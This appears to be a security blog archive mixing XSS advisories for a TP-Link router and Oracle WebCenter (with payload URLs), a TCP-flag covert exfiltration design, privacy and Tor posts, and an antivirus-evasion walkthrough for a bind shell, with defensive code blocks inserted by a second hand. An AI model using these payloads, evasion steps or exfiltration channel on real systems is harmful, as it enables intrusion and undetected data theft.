TP-Link wireless router Archer C1200 – Cross-Site Scripting

Disclaimer: [This code is for educational purposes. I would not be responsible for any misuse of the information mentioned in this blog post.]

Hello folks. An input validation vulnerability was found in the TP-Link Archer C1200 v1.0, which results in client-side code execution.

[+] Unauthenticated

[+] Affected Version: Firmware version: 1.13 Build 2018/01/24 rel.52299 EU

[·] Impact: Client-side attacks are very common and are the source of the largest number of user compromises. With this attack, the threat actor can steal cookies or redirect an innocent victim to a malicious website, thus compromising the user.

[·] Reason: The remote web server does not filter special characters or illegal input.

[+] Attack type: Remote

[+] Patch Status: Unpatched

[+] Exploitation:

[!] The cross-site scripting vector can be executed as illustrated below:

http://hostname/webpages/data/_._.<img src=a onerror=alert("Reflected-XSS")>../..%2f

[-] Responsible Disclosure:

  • April, 2018 – Contacted TP-Link via their web based form
  • May, 2018 – No Reply yet
  • May 26, 2018 – Public Disclosure

TCP based covert channel (ChorTCP)

While researching data exfiltration techniques and covert channels, I thought of making one of my own, dubbed ChorTCP. Protocol-over-protocol tunneling is a well known concept, but I really wanted to hypothesize one aspect of it and then implement it, just for fun. The abstract below is taken from the white paper as is. The main benefit of this technique is that deep packet inspection firewalls will not see any application-layer payload; at most, the traffic will look malformed.

Introduction

ChorTCP is a covert channel created over the TCP protocol. The overall concept revolves around the exfiltration of data without sending any data at the application layer. This is accomplished by sending specially crafted packets, with specific flags set, to the server. When the generated packets are analyzed, they appear to be either random scans or malformed traffic.

Detailed description

The technique requires two components, a server and a client. The client encodes the data to be exfiltrated and sends it to the server. To hide from analysis what data is being exfiltrated, TCP flags are used instead of a payload. The advantage of this technique is that the sending and receiving protocol and the dictionary can both be changed, giving many possible variations of the same exfiltration technique.

The dictionary selected for this technique is the Morse-code dictionary, modified for the requirements of the technique. The details of the POC are described later in this chapter; for now, the protocol is illustrated.

In Morse code, "." and "-" are represented as a short tone and a long tone respectively. Sending Morse-code style data over a TCP/IP network via the flags required subtle changes, which are explained later in the chapter.

Under the hood

The exfiltration protocol works with four flags: SYN, FIN, PSH and URG. The technique is versatile; if required, the flags can be changed.

The data exfiltration is performed using the SYN and URG flags; the PSH and FIN flags are used as delimiters. As mentioned earlier, the dictionary is that of Morse code, changed to fit the technique: "." and "-" were replaced with SYN and URG respectively, and a few other characters were added. The Morse-code dictionary thus becomes:

Any data that the client program encounters is encoded and then sent to the server on a specific port. The server does not open a listening socket on that port; instead, it sniffs the traffic for the mutually agreed port. The protocol works as follows:

Each character of the data to be exfiltrated is converted into a code of SYN and URG. This means that the character 'r' in the word root is converted to 'SSSUUSU', which sends three SYN packets, then two URG packets, then a SYN and a URG. The server on the other end converts the incoming SYN and URG sequence back into 'r'.

The protocol explained:

  1. The protocol for a non-NAT environment is illustrated below [implemented in the POC]:

Client —|SYN|—> Server

Client —|SYN|—> Server

Client —|SYN|—> Server

Client —|SYN|—> Server

Client —|URG|—> Server

Client —|URG|—> Server

Client —|SYN|—> Server

Client —|URG|—> Server

Client —|FIN|—> Server

This packet tells the server that the end of the letter has been reached.

Server —|PSH|—> Client

The server responds with an acknowledgement by sending a PSH packet.

Client —|SYN|—> Server

The client resumes the next character.

Once the end of the word has been reached, the client sends a FIN + PSH packet to the server, indicating the end of the word. This process continues until the end of the data has been reached.

  2. The protocol for a NAT network is illustrated below. Note that this option is yet to be implemented and is not part of the POC.

Client —|SYN|—> Server

Client —|SYN|—> Server

Client —|SYN|—> Server

Client —|SYN|—> Server

Client —|URG|—> Server

Client —|URG|—> Server

Client —|SYN|—> Server

Client —|URG|—> Server

Client —|FIN|—> Server

This packet tells the server that the end of the letter has been reached.

Server —|PSH|—> Client

The server responds with an acknowledgement by sending a PSH packet.

Client —|SYN|—> Server

The client resumes the next character.

It was observed that, in the environment where the implementation was tested, Network Address Translation was not applied to the FIN, PSH and URG packets. It was tested against a TP-Link home wireless router and F-Secure Sense. Thus, removing the PSH packet from the protocol was hypothesized as a solution; this would also remove the overhead of the client waiting for an acknowledgement from the server.
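A decoder and detector for this channel, added here as an example; it is not the ChorTCP POC and not the post's own code. Because the modified dictionary image is not reproduced above, it assumes plain International Morse with a bare SYN as "." and a bare URG as "-", a bare FIN closing a letter, FIN+PSH closing a word, and the server's PSH being a data-less acknowledgement, so it decodes both the acknowledged variant and the PSH-less NAT variant. Input is a constructed list of (src, dst, dport, flags) tuples using Scapy-style flag letters, the shape a pcap parser would emit. The detection rule is the one a network sensor can apply without knowing the dictionary: a sender that never sets ACK yet emits bare URG segments is not a conforming TCP stack.

```python
"""Decoder and detector for a ChorTCP-style flag-only covert channel.

Added example, not the ChorTCP POC. Assumptions (the post's modified
dictionary is not reproduced, so these are mine):
  * International Morse, '.' carried by a bare SYN, '-' by a bare URG;
  * a bare FIN ends a letter, FIN+PSH ends a word, a PSH from the server is
    only an acknowledgement and carries no symbol;
  * packets arrive as (src, dst, dport, flags) tuples with Scapy-style flag
    letters ('S', 'U', 'F', 'FP', 'SA', ...).
"""
from collections import defaultdict

MORSE = {
    "a": ".-", "b": "-...", "c": "-.-.", "d": "-..", "e": ".", "f": "..-.",
    "g": "--.", "h": "....", "i": "..", "j": ".---", "k": "-.-", "l": ".-..",
    "m": "--", "n": "-.", "o": "---", "p": ".--.", "q": "--.-", "r": ".-.",
    "s": "...", "t": "-", "u": "..-", "v": "...-", "w": ".--", "x": "-..-",
    "y": "-.--", "z": "--..", "0": "-----", "1": ".----", "2": "..---",
    "3": "...--", "4": "....-", "5": ".....", "6": "-....", "7": "--...",
    "8": "---..", "9": "----.",
}
FROM_MORSE = {code: char for char, code in MORSE.items()}


def decode_flag_stream(flags):
    """Turn one sender's flag sequence back into text.

    SYN -> '.', URG -> '-', FIN closes a letter, FIN+PSH closes a word.
    Anything else (server PSH acks, stray packets) carries no symbol.
    Unknown Morse sequences decode to '?' instead of raising, so a partial
    capture still yields whatever it can.
    """
    words, word, letter = [], [], []

    def close_letter():
        if letter:
            word.append(FROM_MORSE.get("".join(letter), "?"))
            letter.clear()

    def close_word():
        close_letter()
        if word:
            words.append("".join(word))
            word.clear()

    for f in flags:
        bits = set(f)
        if bits == {"S"}:
            letter.append(".")
        elif bits == {"U"}:
            letter.append("-")
        elif bits == {"F", "P"}:
            close_word()
        elif bits == {"F"}:
            close_letter()
    close_word()  # flush a trailing letter/word if the capture ended early
    return " ".join(words)


def find_covert_flows(packets, min_symbols=4):
    """Flag flows whose sender never sets ACK yet emits bare URG packets.

    A conforming stack sets ACK on every segment after the initial SYN and
    never sends URG without ACK, so a run of ACK-less SYN/URG packets to one
    port is either a scanner or a channel like this one. Returns
    {(src, dst, dport): decoded_text}.
    """
    flows = defaultdict(list)
    for src, dst, dport, flags in packets:
        flows[(src, dst, dport)].append(flags)

    findings = {}
    for flow, seq in flows.items():
        if any("A" in f for f in seq):
            continue                       # real handshake/data traffic
        symbols = [f for f in seq if f in ("S", "U")]
        if len(symbols) >= min_symbols and "U" in seq:
            findings[flow] = decode_flag_stream(seq)
    return findings


# Constructed sample: one covert flow spelling "ok" to port 5555, interleaved
# with the server's PSH acknowledgements and an ordinary HTTPS connection.
CLIENT, SERVER, WEB = "10.0.0.5", "203.0.113.9", "198.51.100.7"
SAMPLE_LOG = [
    (CLIENT, SERVER, 5555, "U"), (CLIENT, SERVER, 5555, "U"),
    (CLIENT, SERVER, 5555, "U"), (CLIENT, SERVER, 5555, "F"),   # 'o' = ---
    (SERVER, CLIENT, 40000, "P"),                                # server ack
    (CLIENT, SERVER, 5555, "U"), (CLIENT, SERVER, 5555, "S"),
    (CLIENT, SERVER, 5555, "U"), (CLIENT, SERVER, 5555, "FP"),  # 'k' = -.-
    (CLIENT, WEB, 443, "S"), (WEB, CLIENT, 51000, "SA"),
    (CLIENT, WEB, 443, "A"), (CLIENT, WEB, 443, "PA"),           # benign
]

if __name__ == "__main__":
    for flow, text in find_covert_flows(SAMPLE_LOG).items():
        print(f"covert channel {flow[0]} -> {flow[1]}:{flow[2]} decodes to {text!r}")
```

The ACK-less test is deliberately dictionary-independent: swapping SYN/URG for other flags, as the post says is possible, still leaves a sender that never completes a handshake, which is what a sensor should key on.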

POC (ChorTCP)

The POC is implemented in Python using the Scapy library. The POC will be uploaded soon. The code can be downloaded here…

Way Forward

A SYN-based scanner will be implemented on the client side to first detect which ports are accessible outbound from the target box; once determined, the client will start using that port for exfiltration. Moreover, the server will sniff traffic on all ports, but once it receives a packet with the same source and destination port, it will only sniff that port.

This is a very basic concept and has been tested on non-NAT networks. More sophistication, for example functions to detect whether the firewall is blocking the requests, will be added later on.

The Art of Privacy – Part 3

This is the best part of the whole series, as in this part I will tell you what to do to protect yourself from prying eyes, whether those eyes belong to hackers or to oppressive regimes (such a relative term 🙂). It's usually such a good feeling when you realize and appreciate that your thoughts are your own; imagine if someone could read your mind, siphon off anything you think, mine that data, extract the useful bits of information and then use it. Well, this is what is going on nowadays in the cyber world, which has already been discussed (briefly) earlier in this series.

So, how do I become invisible to everyone, even to the point where one has contingencies in case life turns into the plot of I, Robot?

The privacy protection can be divided into two parts:

Physical – In context of cyber

Cyber

Physical protection entails protecting your credit card data and the information on your phone's screen. Please keep in mind that this is not a tutorial on learning kung fu to protect your wallet or phone from thieves; it is about what data an attacker can extract without even making contact with you, and how you can secure it so that such attacks are rendered unsuccessful.

Nowadays, if we notice, all credit/debit cards are contactless, which means, in layman's terms, that you just touch the point-of-sale machine with the card and you are good to go. It is a well-known fact that a threat agent can use cheap hardware to read information from the credit card from a distance. The same goes for bus cards, tram/train tickets, etc. They all use RFID technology now.

The easiest way to protect them from an attack is to use a wallet with RFID protection. You can find many different kinds of wallets in the supermarket. If you love your own wallet, or your wife gave it to you as a gift and you will be sleeping outside the house if you don't use it, then, my friends, there is another solution: you can easily buy RFID protection sleeves which hold your cards and can then be put into your wallet. You can buy them anywhere as well. I have been using the sleeves in my wallet too. I got the F-Secure ones; they work pretty well.

Information on phones can be protected by adding a privacy screen protector to your phone. They come for Android devices and for the iPhone/iPad/iWhatevertheycomeupwithNext.

Cyber-based protection entails everything done online or offline that deals with the non-physical: bits and bytes! In the case of cyber, the threat actors have already been explained in the previous articles of this three-part series.

The first thing one must, and I say MUST, do is install a VPN. VPNs are virtual private networks which, in a nutshell, encrypt all traffic between you and their server. Think of it as an underground tunnel with a special train that makes you invisible, so you can easily pass through any barriers, exit the city you want to exit undetected and then carry on. Usually, when your traffic is going through the network, it looks like this (again, a lot is going on, but to explain my point it is illustrated this simply):

You ==> Your ISP — |Prying eyes| ===> Google/Facebook/Instagram/Blah/Blah and Blah

When you are going through a VPN:

You =|Encrypted tunnel|=> VPN server (ISP? WHO/WHAT?) ===> Google/Facebook/Instagram/Blah/Blah and Blah

So, that was that: a VPN is a must if you want to stay anonymous. Of course, one should never abuse this. Never do anything illegal!

The VPNs which I have personally used are F-Secure Freedome and Private Internet Access, which are quite good, with respect to price, log retention, speed.

Secondly, browser add-ons are your best friends: NoScript, Disable WebRTC, HTTPS Everywhere, uBlock Origin, User-Agent Switcher. These are some of the add-ons for Mozilla Firefox; if you are a Chrome user, find the equivalent add-ons.

Using proxies is usually not a good option for anonymizing your traffic, as WebRTC can reveal your real IP unless it is disabled on the browser side. Furthermore, JavaScript can be used to extract your real IP. So, in short, don't use proxies.

TOR is another good example of how to keep yourself anonymous. Note that TOR works as a proxy, but it is untraceable. The operating system, as well as all other apps which are not proxy-aware and have not been explicitly given the proxy's IP, will connect to their respective services normally and not through TOR.

Just remember: if you are using TOR, never use your credentials on websites which do not run on HTTPS.

These are some of the things that privacy-conscious people use to protect themselves. I would recommend them to all the great readers out there.

Stay Safe.

 

~Peace

The Art of Privacy – Part 2

The biggest threat to privacy is the attitude of "Ah, what would someone do with my email address, phone number or social security number?". Thanks to awareness of security, security terminology becoming a fad and the names of attacks becoming more and more attractive, non-security-savvy people are starting to somewhat understand the tricks malicious attackers use to lure people into giving out their private information.

Unfortunately, this isn't enough. Privacy threat actors range from a 13-year-old sitting at a computer to state-sponsored hackers, law enforcement and advertising agencies, which technically work within the bounds of the law and aren't doing anything illegal.

The problem, which I have been talking about for ages, is that there is so much unprotected personal information available on the internet that you cannot pinpoint and blame a specific person for taking the data and using it. Then we have the problem of data leaks, for example the recent Equifax data leak. Data leaks and public dumps are a recent trend. In the early 2000s there were more breaches because, well, SQL injection was new; even now SQL injection is the reason for a breach almost 50% of the time. Imagine, when it was new and Google dorking was new, how many databases would have been dumped and passed around in the underground, but they never made the news or weren't available for anyone to download.

The dumps of emails and passwords leaked from LinkedIn, Twitter etc. are now on several websites. As examples, see the two websites below:

https://haveibeenpwned.com

https://hacked-emails.com/

Technically, they do not show you anyone else's password; they just tell you whether your email is in the list of hacked databases, but they have all the raw data, so…

I have been using a website called Pastebin for years now, which is quite valuable when it comes to finding your leaked information. Google is also a very well-known platform for finding leaked information using Google dorks.

Well, if we talk about data leaks, one can argue that it is not an individual's fault that the data got leaked. It was because of an Apache Struts vulnerability (unpatched, though the patch was released ages ago 🙂) that the server got pwned! Yes, so that is not the individual's fault. It is the individual's fault when he is in the military and gives every detail about what he is doing and on which technology, so that anyone can track him down. What happens when people do that, you ask? ICWATCH happens!!!! It is also the individual's fault when he/she makes all his/her pictures public on Facebook, Instagram or any other social networking website. What can someone do with my picture from Facebook, you ask? It is not a social security number or your phone number, you say? I will just give an example or two of what they can do, apart from selling your picture to advertisers, or a bad, bad man getting hold of your pictures, extracting the GPS location embedded in them (thank you, smartphones) and getting your home address:

Example: So let's talk about cryptocurrency, Bitcoin and the whole shebang. Oh, so cryptocurrency is untraceable, right? What do we do? Well, what the high-end exchanges now do is require a picture of you taken from a camera and a photo ID for you to be able to register with that exchange, set up a wallet and so on. After that, whatever transaction you do can be chained back to your account and inevitably to you. Unless you are using Monero!! So, about the attack: let's call the attacker "Evil Joe". Evil Joe gets your selfie from Facebook, which he/she conveniently finds online as it is public, uses that picture for the first round of verification and, in the second round, uses a different picture, photoshops it onto a photo ID, scans it and uploads it. Next, he sets his username and password and boom, he has stolen your face identity. Now whatever transaction he does comes back to your face and, as most law enforcement agencies have facial recognition, they will contact you and you are in trouble, at least until they are sure that you weren't involved.

One other scenario that I would like to briefly describe: for example, you have facial recognition on your Samsung S8. A thief steals your phone or purse (ladies). What can he do with it? Search your name on the internet, on Facebook; if he finds a public picture somewhere in which your face is prominent, he can use that to unlock your phone.

There are many other attacks, social engineering being the most effective, but for that I would refer to different books as this has been covered thoroughly by many people.

Recently, I saw a very well-renowned political figure of a country on Twitter. She shared a picture of a document where she did not think to remove the name, phone number and social security number of another government official. I think that was because she has no concept of why exposing a social security number is a very bad thing.

In the third part, I will explain how to protect yourself from these threat actors and how to be anonymous and invisible to prying eyes.

~Peace

The Art of Privacy – Part 1

This is a three-part special. The first part covers what privacy means to a normal person, how it impacts that person's normal day-to-day life, and the facts about what is going on in the cyber world in terms of privacy.

The second part will comprise the mistakes that people make and the mindset people have about internet privacy.

The third and final part covers how you can protect yourself against attacks, even if you aren't computer savvy. You will also be introduced to the technologies used nowadays to defend against privacy breaches.

Part 1:

Let's start with what privacy is, though all of you might already know. Privacy is the right of an individual to keep his/her private things private. Technology is a part of our lives now and, unfortunately, the threat landscape is quite big in terms of privacy.

You might have heard about IoT (Internet of Things), which means all the devices that are connected to the internet and to each other, for example cameras, locks, fridges etc. There have been many security concerns about IoT devices, which I will not be covering here.

Technology has become closely intertwined with our daily lives. Take cell phones: instead of having different devices for different tasks, smartphones now have everything in one package, such as GPS, 3G/4G, Bluetooth and NFC, technologies with many applications in our day-to-day life. The internet is a technology we are so dependent on that a little disruption causes us serious discomfort. These technologies can be attacked to invade one's privacy.

Security and privacy have always had a love/hate relationship. Complete security requires a privacy breach at some level, which becomes a problem in the case of complete privacy. Last year the General Data Protection Regulation (GDPR) was adopted in the EU; it has several detailed points about the protection of privacy for EU citizens and residents. This is a very good thing but, to be honest, it protects our data on services such as Google or other corporate entities. What about hackers, intelligence agencies, cyber armies? How should we protect ourselves against them? How can we keep our personal information personal? I will tell the good readers how to protect one's privacy online in part 3 of this article.

Now I would like to briefly talk about attacks against privacy. Recently we heard about the NSA snooping into mobile networks and reading SMS etc. Due to the leaks, the world now knows about Hacking Team and FinFisher, the companies which blatantly sell command-and-control implants to governments and even law enforcement agencies, which were initially used to spy on activists, journalists, etc. Nowadays, due to the threat of increasing cybercrime, the implants might be used against normal people if they are persons of interest to law enforcement. For example, the recent surveillance law in Germany empowers the German police to read the WhatsApp messages of people who become persons of interest to the police. Though direct interception is not possible, most probably they would use some kind of social engineering technique to install the police-controlled implant onto the target's cell phone. Similar surveillance powers are or will be given to the police in the UK.

To be very clear: if the person has committed a crime and/or is a bad guy, which is quite hard to know unless it is Tom Cruise's Minority Report and there is a pre-crime unit, then I am completely in favor of this surveillance law. But knowing which of the suspects is a real bad guy and which is innocent is quite hard, so there would be a large number of false positives who would lose their privacy as collateral.

There have been so many cases of identity theft in different countries due to breaches, leaks, phishing etc. With your identity stolen, you can lose your bank accounts, end up on a police wanted list, come under serious debt, etc. Apart from identity theft, there is GPS spoofing, where you can be sent somewhere else and the information you carry may be taken by force; cell phone hacking; television hacking and voice snooping; implants to intercept internet traffic at the ISP end; SMS interception; and SS7-based attacks. All of these are attacks against normal people which are used to compromise confidentiality and breach the privacy of the intended targets.

At the end of this three-part article, I will mention different books covering privacy and how to be invisible.

Thanks for reading.

Part 2 would be coming out soon!

Peace!

Want to be heard and can’t register a domain?

Back when I had dial-up internet, I used to host stuff on my computers and give my public IP to friends so that they could enjoy, or make use of, what I had to share. Back then there wasn't any Facebook, hi5, Orkut or any mobile chat apps. The only cool thing we had was IRC (\\// Live long and prosper). I felt so empowered that I could host something on my computer and share it with friends; ok, so what if I got DoSed (denial of service) many times and my computer froze because, well, I had Windows 98 installed. That was the time when the "Ping of death" was a thing. Good times, though. Coming back to the topic: as I mentioned, I could host stuff online and ask people to connect to my IP, but the bandwidth was very poor, so that model didn't work so well, and did I mention I got DoSed many times? Nowadays there are a lot of online services, free website hosting like 110mb.com, wordpress.com, blogger.com, etc. Many people use these services and are super happy with them.

Sometimes you want to share something and keep it on your own computer. How do you do that? Well, some of you might say: "We have a DSL/fiber connection; we can set up reverse NAT and we are good to go". My answer to them is: what if your public IP changes? That becomes a problem! I recently saw a television program about the darknet and how only bad people use it, and if you are a criminal then you are on a darknet. Well, all this is quite dramatic, to be honest. Yes, criminals use it, but it wasn't designed for them; they use it because of the anonymity features.

To solve the above-mentioned problem, TOR can be used. Yes, TOR is anonymizing software and it can be used to host websites or any kind of service. There are some very simple steps to set it up. You can set it up on your computer or a Raspberry Pi. Follow these simple steps to install a hidden service:

  1. Install TOR: apt-get install tor
  2. Edit the Tor configuration file: nano /etc/tor/torrc
  3. Find the hidden services section and edit: HiddenServicePort <port on onion> 127.0.0.1:<mapped internal port>
  4. Set up a hidden service directory and add it to the config file (</blah/hidden_service/>). Chmod it to 700 (sometimes TOR complains about loose permissions)
  5. Run tor. Get the onion domain name from the hostname file.
  6. Have fun!!!!

Once it is set up you can see your .onion domain name in the hostname file, but to access it you have to be on the TOR network. There is some good news as well: you can also access it from the internet via Tor2web. It is rather simple, really: if you have a domain "myblahblahblahdomain.onion", you just add ".to" to the end and you are good to go. So the end URL would be: "http://myblahblahblahdomain.onion.to/".
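The steps above, done from a script instead of by hand, as an added example that is not part of the original post. It assumes the Debian layout the post uses (/etc/tor/torrc, a hidden-service directory of your choosing) and that Tor itself is installed and started separately; the `demo()` function runs everything in a scratch directory so the logic can be exercised without root or a running Tor. Besides writing the stanza, it checks the two things that commonly go wrong: the 700 permission the post mentions, and a HiddenServicePort target that is not 127.0.0.1, which would also expose the service directly, outside Tor.

```python
"""Hidden-service setup for the steps above, with a configuration check.

Added example, not the post's code. Assumes Debian-style paths (torrc and a
hidden-service directory you pick) and that Tor is installed separately.
"""
import os
import stat
import tempfile
from pathlib import Path


def hidden_service_stanza(hs_dir, onion_port, local_port, local_host="127.0.0.1"):
    """The two torrc lines a hidden service needs: HiddenServiceDir is the
    directory from step 4, HiddenServicePort the mapping from step 3."""
    return (f"HiddenServiceDir {hs_dir}\n"
            f"HiddenServicePort {onion_port} {local_host}:{local_port}\n")


def install_hidden_service(torrc, hs_dir, onion_port, local_port):
    """Create the service directory with mode 0700 and append the stanza to
    torrc once (re-running does not duplicate it). Returns the stanza."""
    hs_dir = Path(hs_dir)
    hs_dir.mkdir(parents=True, exist_ok=True)
    hs_dir.chmod(0o700)            # Tor refuses to start on looser permissions
    stanza = hidden_service_stanza(hs_dir, onion_port, local_port)
    torrc = Path(torrc)
    existing = torrc.read_text() if torrc.exists() else ""
    if stanza not in existing:
        with torrc.open("a") as fh:
            fh.write("\n" + stanza)
    return stanza


def check_hidden_service(torrc, hs_dir):
    """Return a list of problems with the configuration (empty means fine).

    Checks the 0700 permission, and that every HiddenServicePort target is a
    loopback address: a target on 0.0.0.0 or a LAN address would expose the
    service outside Tor as well, which defeats the point of the setup.
    """
    problems = []
    mode = stat.S_IMODE(os.stat(hs_dir).st_mode)
    if mode != 0o700:
        problems.append(f"{hs_dir}: mode is {oct(mode)}, Tor wants 0o700")
    for line in Path(torrc).read_text().splitlines():
        parts = line.split()
        if len(parts) == 3 and parts[0] == "HiddenServicePort":
            host = parts[2].rsplit(":", 1)[0]
            if host not in ("127.0.0.1", "localhost", "[::1]"):
                problems.append(f"{line!r}: target {host} is not loopback")
    return problems


def read_onion_hostname(hs_dir):
    """Step 5: Tor writes the .onion name into <hs_dir>/hostname on first start."""
    path = Path(hs_dir) / "hostname"
    return path.read_text().strip() if path.exists() else None


def demo():
    """Run the whole sequence in a scratch directory and return the results."""
    base = Path(tempfile.mkdtemp(prefix="hs_demo_"))
    torrc, hs_dir = base / "torrc", base / "hidden_service"
    stanza = install_hidden_service(torrc, hs_dir, 80, 8080)
    install_hidden_service(torrc, hs_dir, 80, 8080)   # second run: no duplicate
    # Tor would write this file itself; the value is a constructed placeholder.
    (hs_dir / "hostname").write_text("placeholderonionaddress.onion\n")

    # A deliberately bad variant: loose permissions and a non-loopback target.
    bad_torrc, bad_dir = base / "torrc_bad", base / "hs_bad"
    bad_dir.mkdir()
    bad_dir.chmod(0o755)
    bad_torrc.write_text(f"HiddenServiceDir {bad_dir}\nHiddenServicePort 80 0.0.0.0:8080\n")

    return {
        "stanza": stanza,
        "stanza_count": torrc.read_text().count("HiddenServiceDir"),
        "problems": check_hidden_service(torrc, hs_dir),
        "hostname": read_onion_hostname(hs_dir),
        "bad_problems": check_hidden_service(bad_torrc, bad_dir),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

On a real box, call `install_hidden_service("/etc/tor/torrc", "/var/lib/tor/hidden_service", 80, 8080)` as root, make sure the directory is owned by the user Tor runs as, restart Tor, then `read_onion_hostname` gives the name from step 5.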

That is it, you are good to go and enjoy your free hosting.

Antivirus Evasion

A few weekends back I was wondering how malware evades antivirus solutions. Is it really that easy?

With that in mind, I started looking at some known malware pieces and randomly picked an anti-malware solution. To my surprise, AVs can still be tricked with old techniques such as the string substitution method, so today we will explore this very well-known technique. For testing purposes I chose ncx as the test malware, which binds itself to port 99 and, when someone connects to it, gives a command prompt of the system.

First, let's scan the default malware to check whether it is detected or not.

As can be seen in the screenshot below, ncx is detected by our antivirus.

Let's split the file into small chunks. After a bit of trial and error I found that splitting into 17 bytes does not break any AV signature; the trick here is that we have to keep splitting the files as long as the AV keeps flagging them.

On scanning the split chunks, two detections were made by our AV, i.e. chunks 1 and 4 were identified as malicious.

Change the lower-case 'cmd' to upper-case 'CMD' and save it.

Yes, no more detection!

In the sixth line of split chunk number 1, let's change the upper-case 'S' to lower-case 's' and save it.

Scan it again, and the AV no longer detects this chunk.

Finally, join the files back together.

Rename the joined file.

The scan shows no more detections 🙂

And we can see that on execution it is indeed listening on port 99.

POC Video:

Oracle Web Center XSS

Oracle Web Center XSS
Details
========================================================================================
Product: Oracle Web Center [Versions 11.1.1.9.0, 12.2.1.1.0, 12.2.1.2.0]
Security-Risk: High
Remote-Exploit: yes
Vendor-URL: https://www.oracle.com/
CVE-ID: CVE-2017-10075
CVSS: 8.2

Credits
========================================================================================
Discovered by: Owais Mehtab & Tayeeb Rana


Affected Products:
========================================================================================
Oracle Web Center [Versions 11.1.1.9.0, 12.2.1.1.0, 12.2.1.2.0]

Description
========================================================================================
Two cross-site scripting (XSS) vulnerabilities have been identified in Oracle Web Center.
They can be easily exploited and used to steal cookies, perform phishing attacks and
various other attacks compromising the security of a user.

Proof of Concept
========================================================================================
http://example.com/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=XXXXXXXXXXXX<svg/onload=alert(/xss/)>&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=OO


http://example.com/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=AAA&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=XXXXXXXXXXXX<svg/onload=alert(/xss/)>

 


Solution
========================================================================================
Apply Oracle CPU July 2017
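Both reflected-XSS advisories on this page (the TP-Link Archer C1200 one at the top and this Oracle Web Center one) come down to a parameter echoed into HTML unencoded. The following is an added example, not part of either advisory, showing the two defender-side pieces: a scanner that finds such probes in web-server access logs after undoing percent-encoding (including double-encoding), and the entity-encoding the pages should have applied before reflecting input. The log lines are constructed in the Apache/nginx combined format; two request paths are taken from the advisories on this page (the C1200 path percent-encoded the way a browser sends it, the Oracle one trimmed to the reflected ResultsTitle parameter), and the rest are filler or constructed variants.

```python
"""Reflected-XSS probe detection in access logs, plus the missing encoding.

Added example, not from either advisory. SAMPLE_LOG is constructed; two of
its request paths are copied from the advisories on this page, the rest are
filler or constructed variants.
"""
import html
import re
from urllib.parse import unquote

# Markers that a well-behaved client has no reason to put into a URL
SUSPICIOUS = re.compile(
    r"<\s*(script|svg|img|iframe|body|object|embed)\b"  # tag in a parameter
    r"|\bon(error|load|mouseover|focus|click)\s*="       # inline event handler
    r"|javascript\s*:",                                   # javascript: scheme
    re.IGNORECASE,
)
# Combined log format: ip ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) \S+" (\d{3})')


def fully_decode(target, rounds=3):
    """Percent-decode until stable, so %3Csvg and the double-encoded
    %253Csvg both surface as <svg; bounded so hostile input can't loop."""
    for _ in range(rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target


def scan_access_log(lines):
    """Return (client_ip, status, first_marker) for every request whose
    decoded path or query carries an injection marker. The status is kept
    because a 200 on such a request is the one to look at first: the page
    rendered whatever was sent."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                       # not a combined-format line
        ip, _method, target, status = m.groups()
        found = SUSPICIOUS.search(fully_decode(target))
        if found:
            hits.append((ip, int(status), found.group(0)))
    return hits


def reflect_safely(value):
    """What a page must do before echoing a parameter into HTML text or an
    attribute value: entity-encode it, so <img ...> arrives as literal text."""
    return html.escape(value, quote=True)


SAMPLE_LOG = [
    # C1200 advisory path, percent-encoded as a browser would send it
    '198.51.100.23 - - [26/May/2018:10:01:02 +0000] "GET /webpages/data/_._.%3Cimg%20src=a%20onerror=alert(%22Reflected-XSS%22)%3E../..%2f HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [26/May/2018:10:01:09 +0000] "GET /webpages/index.html HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
    # Oracle advisory, trimmed to the reflected parameter
    '198.51.100.23 - - [26/May/2018:10:02:41 +0000] "GET /cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultsTitle=XXXXXXXXXXXX%3Csvg/onload=alert(/xss/)%3E HTTP/1.1" 200 8192 "-" "Mozilla/5.0"',
    # Legitimate query from the same advisory: contains '<' but no markup
    '203.0.113.7 - - [26/May/2018:10:03:00 +0000] "GET /cs/idcplg?IdcService=GET_SEARCH_RESULTS&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60) HTTP/1.1" 200 8192 "-" "Mozilla/5.0"',
    # Constructed double-encoded probe; only visible after two decode rounds
    '198.51.100.23 - - [26/May/2018:10:04:15 +0000] "GET /webpages/data/%253Csvg%2Fonload%3Dalert(1)%253E HTTP/1.1" 404 210 "-" "curl/7.58.0"',
]

if __name__ == "__main__":
    for ip, status, marker in scan_access_log(SAMPLE_LOG):
        print(f"{ip} status={status} marker={marker!r}")
    print(reflect_safely('<img src=a onerror=alert("Reflected-XSS")>'))
```

The scanner is a triage aid, not a filter: the fix is `reflect_safely` (or the framework's equivalent) at every point where a parameter is written into the page, which is what the vendor patches do.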

Downside of keeping everything public – ICWATCH

I have been writing and preaching about Social network information harvesting and why it is a bad thing (Check out the post here). I recently stumbled upon something, which is, publicly known though, but still worth mentioning. The mentioned “something” is a very good example of why too much information about one’s self is never a good idea.

I was having some fun with Riddler the other day. For those who do not know what Riddler is, well it is F-Secure’s search engine for web domains and much more. Unlike Shodan where all ports are scanned and then the headers are saved in a database, Riddler can be used to query about specific domains and subdomains and get some very very interesting information. So, as I was saying, that I was having fun with Riddler and I stumbled upon a strange subdomain of (Strange subdomain).

